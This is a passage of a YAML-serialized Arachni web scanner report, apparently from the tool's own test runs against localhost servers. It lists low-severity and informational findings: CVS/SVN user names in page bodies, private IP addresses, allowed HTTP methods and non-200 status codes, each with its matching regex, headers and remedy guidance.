    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: A CVS or SVN user is disclosed in the body of the HTML page.
  elem: body
  internal_modname: CvsSvnUsers
  method: GET
  mod_name: CVS/SVN users
  name: CVS/SVN user disclosure.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/200.html
  remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
  severity: Low
  tags: []

  url: http://localhost:14511/author
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: A CVS or SVN user is disclosed in the body of the HTML page.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "24"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: CvsSvnUsers
    method: GET
    mod_name: CVS/SVN users
    name: CVS/SVN user disclosure.
    opts: 
      :regexp: "(?-mix:\\$Author: (\\w+) \\$)"
      :match: markd_author
      :element: body
    references: 
      CWE: http://cwe.mitre.org/data/definitions/200.html
    regexp: "(?-mix:\\$Author: (\\w+) \\$)"
    regexp_match: markd_author
    remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
    response: "$Author: markd_author $ "
    severity: Low
    tags: []

    url: http://localhost:14511/author
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: A CVS or SVN user is disclosed in the body of the HTML page.
  elem: body
  internal_modname: CvsSvnUsers
  method: GET
  mod_name: CVS/SVN users
  name: CVS/SVN user disclosure.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/200.html
  remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
  severity: Low
  tags: []

  url: http://localhost:14511/id
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: A CVS or SVN user is disclosed in the body of the HTML page.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "60"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: CvsSvnUsers
    method: GET
    mod_name: CVS/SVN users
    name: CVS/SVN user disclosure.
    opts: 
      :regexp: "(?-mix:\\$Id: .* (\\w+) Exp \\$)"
      :match: john_id1
      :element: body
    references: 
      CWE: http://cwe.mitre.org/data/definitions/200.html
    regexp: "(?-mix:\\$Id: .* (\\w+) Exp \\$)"
    regexp_match: john_id1
    remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
    response: "$Id: https-test.pl 1081 2008-09-30 19:03:23Z john_id1 Exp $ "
    severity: Low
    tags: []

    url: http://localhost:14511/id
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: A CVS or SVN user is disclosed in the body of the HTML page.
  elem: body
  internal_modname: CvsSvnUsers
  method: GET
  mod_name: CVS/SVN users
  name: CVS/SVN user disclosure.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/200.html
  remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
  severity: Low
  tags: []

  url: http://localhost:14511/id2
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: A CVS or SVN user is disclosed in the body of the HTML page.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "56"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: CvsSvnUsers
    method: GET
    mod_name: CVS/SVN users
    name: CVS/SVN user disclosure.
    opts: 
      :regexp: "(?-mix:\\$Id: .* (\\w+) (?<!Exp )\\$)"
      :match: john_id2
      :element: body
    references: 
      CWE: http://cwe.mitre.org/data/definitions/200.html
    regexp: "(?-mix:\\$Id: .* (\\w+) (?<!Exp )\\$)"
    regexp_match: john_id2
    remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
    response: "$Id: https-test.pl 1081 2008-09-30 19:03:23Z john_id2 $ "
    severity: Low
    tags: []

    url: http://localhost:14511/id2
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: A CVS or SVN user is disclosed in the body of the HTML page.
  elem: body
  internal_modname: CvsSvnUsers
  method: GET
  mod_name: CVS/SVN users
  name: CVS/SVN user disclosure.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/200.html
  remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
  severity: Low
  tags: []

  url: http://localhost:14511/header2
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: A CVS or SVN user is disclosed in the body of the HTML page.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "82"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: CvsSvnUsers
    method: GET
    mod_name: CVS/SVN users
    name: CVS/SVN user disclosure.
    opts: 
      :regexp: "(?-mix:\\$Header: .* (\\w+) (?<!Exp )\\$)"
      :match: markd_header2
      :element: body
    references: 
      CWE: http://cwe.mitre.org/data/definitions/200.html
    regexp: "(?-mix:\\$Header: .* (\\w+) (?<!Exp )\\$)"
    regexp_match: markd_header2
    remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
    response: "$Header: /cvsweb/cvs-guide/keyword.html,v 1.3 1999/12/23 21:59:22 markd_header2 $ "
    severity: Low
    tags: []

    url: http://localhost:14511/header2
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: A CVS or SVN user is disclosed in the body of the HTML page.
  elem: body
  internal_modname: CvsSvnUsers
  method: GET
  mod_name: CVS/SVN users
  name: CVS/SVN user disclosure.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/200.html
  remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
  severity: Low
  tags: []

  url: http://localhost:14511/header
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: A CVS or SVN user is disclosed in the body of the HTML page.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "85"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: CvsSvnUsers
    method: GET
    mod_name: CVS/SVN users
    name: CVS/SVN user disclosure.
    opts: 
      :regexp: "(?-mix:\\$Header: .* (\\w+) Exp \\$)"
      :match: markd_header
      :element: body
    references: 
      CWE: http://cwe.mitre.org/data/definitions/200.html
    regexp: "(?-mix:\\$Header: .* (\\w+) Exp \\$)"
    regexp_match: markd_header
    remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
    response: "$Header: /cvsweb/cvs-guide/keyword.html,v 1.3 1999/12/23 21:59:22 markd_header Exp $ "
    severity: Low
    tags: []

    url: http://localhost:14511/header
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: A private IP address is disclosed in the body of the HTML page
  elem: body
  internal_modname: PrivateIP
  method: GET
  mod_name: Private IP address finder
  name: Private IP address disclosure.
  references: 
    WebAppSec: http://projects.webappsec.org/w/page/13246936/Information%20Leakage
  remedy_guidance: Remove private IP addresses from the body of the HTML pages.
  severity: Low
  tags: []

  url: http://localhost:8073/body
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: A private IP address is disclosed in the body of the HTML page
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "21"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: PrivateIP
    method: GET
    mod_name: Private IP address finder
    name: Private IP address disclosure.
    opts: 
      :regexp: (?-mix:(?<!\.)(?<!\d)(?:(?:10|127)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)|192\.168|169\.254|172\.0?(?:1[6-9]|2[0-9]|3[01]))(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){2}(?!\d)(?!\.))
      :match: 192.168.1.12
      :element: body
    references: 
      WebAppSec: http://projects.webappsec.org/w/page/13246936/Information%20Leakage
    regexp: (?-mix:(?<!\.)(?<!\d)(?:(?:10|127)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)|192\.168|169\.254|172\.0?(?:1[6-9]|2[0-9]|3[01]))(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){2}(?!\d)(?!\.))
    regexp_match: 192.168.1.12
    remedy_guidance: Remove private IP addresses from the body of the HTML pages.
    response: "        192.168.1.12\n"
    severity: Low
    tags: []

    url: http://localhost:8073/body
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: A private IP address is disclosed in the body of the HTML page
  elem: header
  internal_modname: PrivateIP
  method: GET
  mod_name: Private IP address finder
  name: Private IP address disclosure.
  references: 
    WebAppSec: http://projects.webappsec.org/w/page/13246936/Information%20Leakage
  remedy_guidance: Remove private IP addresses from the body of the HTML pages.
  severity: Low
  tags: []

  url: http://localhost:8073/header
  var: Disclosure
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: A private IP address is disclosed in the body of the HTML page
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Disclosure: 192.168.1.121
        Connection: close
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: PrivateIP
    method: GET
    mod_name: Private IP address finder
    name: Private IP address disclosure.
    opts: 
      :var: Disclosure
      :regexp: (?-mix:(?<!\.)(?<!\d)(?:(?:10|127)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)|192\.168|169\.254|172\.0?(?:1[6-9]|2[0-9]|3[01]))(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){2}(?!\d)(?!\.))
      :match: 192.168.1.121
      :element: header
    references: 
      WebAppSec: http://projects.webappsec.org/w/page/13246936/Information%20Leakage
    regexp: (?-mix:(?<!\.)(?<!\d)(?:(?:10|127)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)|192\.168|169\.254|172\.0?(?:1[6-9]|2[0-9]|3[01]))(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){2}(?!\d)(?!\.))
    regexp_match: 192.168.1.121
    remedy_guidance: Remove private IP addresses from the body of the HTML pages.
    response: Content-TypeDisclosure
    severity: Low
    tags: []

    url: http://localhost:8073/header
    var: Disclosure
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: The webserver claims that it supports the logged methods.
  elem: server
  internal_modname: AllowedMethods
  method: OPTIONS
  mod_name: Allowed methods
  name: Allowed HTTP methods
  references: 
    Apache.org: http://httpd.apache.org/docs/2.2/mod/core.html#limitexcept
  remedy_guidance: Configure your web server to disallow unnecessary HTTP method.
  severity: Informational
  tags: 
  - http
  - methods
  - options
  url: http://localhost:9936/
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: The webserver claims that it supports the logged methods.
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Allow: OPTIONS, TRACE, GET, HEAD
        Connection: close
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: AllowedMethods
    method: OPTIONS
    mod_name: Allowed methods
    name: Allowed HTTP methods
    opts: 
      :element: server
      :match: OPTIONS, TRACE, GET, HEAD
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.2/mod/core.html#limitexcept
    regexp: ""
    regexp_match: OPTIONS, TRACE, GET, HEAD
    remedy_guidance: Configure your web server to disallow unnecessary HTTP method.
    response: Content-TypeAllow
    severity: Informational
    tags: 
    - http
    - methods
    - options
    url: http://localhost:9936/
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/201
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 201"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 201"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "2011275"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/201
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/202
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 202"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 202"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "2025878"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/202
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/203
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 203"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 203"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "2035746"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/203
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/206
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 206"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 206"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "206922"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/206
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/102
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Connection: close
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 102"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 102"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: ""
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/102
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/207
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 207"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 207"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "2077150"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/207
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/208
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 208"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 208"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "2085060"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/208
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/226
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 226"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 226"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "2266016"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/226
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/300
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 300"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 300"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3005148"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/300
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/301
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 301"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 301"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3015357"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/301
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/302
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 302"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 302"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3029275"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/302
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/303
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 303"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 303"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3038239"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/303
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/305
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 305"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 305"
      :element: server
